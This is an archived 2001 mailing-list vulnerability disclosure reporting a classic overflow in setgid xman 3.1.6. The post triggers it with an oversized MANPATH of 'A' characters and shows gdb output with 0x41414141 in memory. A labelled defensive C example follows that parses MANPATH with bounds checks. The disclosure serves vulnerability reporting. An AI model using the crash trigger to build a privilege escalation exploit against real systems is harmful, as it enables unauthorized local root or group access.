I tried to send this to Bugtraq right about the same time I had connection issues... not sure if it was denied so I figured I would try to send it to vuln-dev just in case.
-KF

-------- Original Message --------
Subject: suid xman 3.1.6 overflows
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslashat_private>
To: bugtraqat_private, srtxgat_private

xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow

srtxgat_private is noted as the packager of this RPM. I do not know the author.

[root@linux lib]# ls -al `which xman`
-rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*
[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault

[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x4022fb66 in getenv () from /lib/libc.so.6
#1 0x0804bc47 in _start ()
#2 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
(gdb) info registers
eax 0xbffee784 -1073813628
ecx 0x804fb29 134544169
edx 0x805414c 134562124
ebx 0x40328f2c 1077055276
esp 0xbffec6fc 0xbffec6fc
ebp 0xbffec714 0xbffec714
esi 0x6 6
edi 0x41414141 1094795585
eip 0x4022fb66 0x4022fb66

-KF
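
An added example, not part of the original post and not xman's source: one way a setgid program can split a colon-separated MANPATH into a fixed-size table and reject oversized input instead of writing past its buffers. The function names and the limits MAX_SECTIONS and MAX_DIR_LEN are assumptions chosen for illustration; the 'A' runs are constructed input matching the lengths used in the post.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SECTIONS 64    /* assumed cap on the number of entries */
#define MAX_DIR_LEN  1024  /* assumed cap on one entry, including the NUL */

/* Split a colon-separated value into dirs[]. Returns the entry count, or -1
 * if the value is missing or would not fit. Empty entries are skipped. */
int split_manpath(const char *value, char dirs[][MAX_DIR_LEN], int max_dirs)
{
    int count = 0;
    if (value == NULL) return -1;
    while (*value != '\0') {
        size_t len = strcspn(value, ":");   /* length of this entry */
        if (len >= MAX_DIR_LEN)             /* too long for one slot */
            return -1;
        if (len > 0) {
            if (count >= max_dirs)          /* table already full */
                return -1;
            memcpy(dirs[count], value, len);
            dirs[count][len] = '\0';
            count++;
        }
        value += len;
        if (*value == ':')
            value++;
    }
    return count;
}

/* Constructed input matching the post: a value made of n 'A' characters. */
int split_run_of_a(size_t n)
{
    static char dirs[MAX_SECTIONS][MAX_DIR_LEN];
    char *buf = calloc(n + 1, 1);           /* zero-filled, so NUL-terminated */
    int rc;
    if (buf == NULL) return -1;
    memset(buf, 'A', n);
    rc = split_manpath(buf, dirs, MAX_SECTIONS);
    free(buf);
    return rc;
}

int main(void)
{
    printf("100: %d, 7000: %d, 70000: %d\n", split_run_of_a(100),
           split_run_of_a(7000), split_run_of_a(70000));
    return 0;
}
```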
This archive was generated by hypermail 2b30 : Fri Jul 13 2001 - 18:47:50 PDT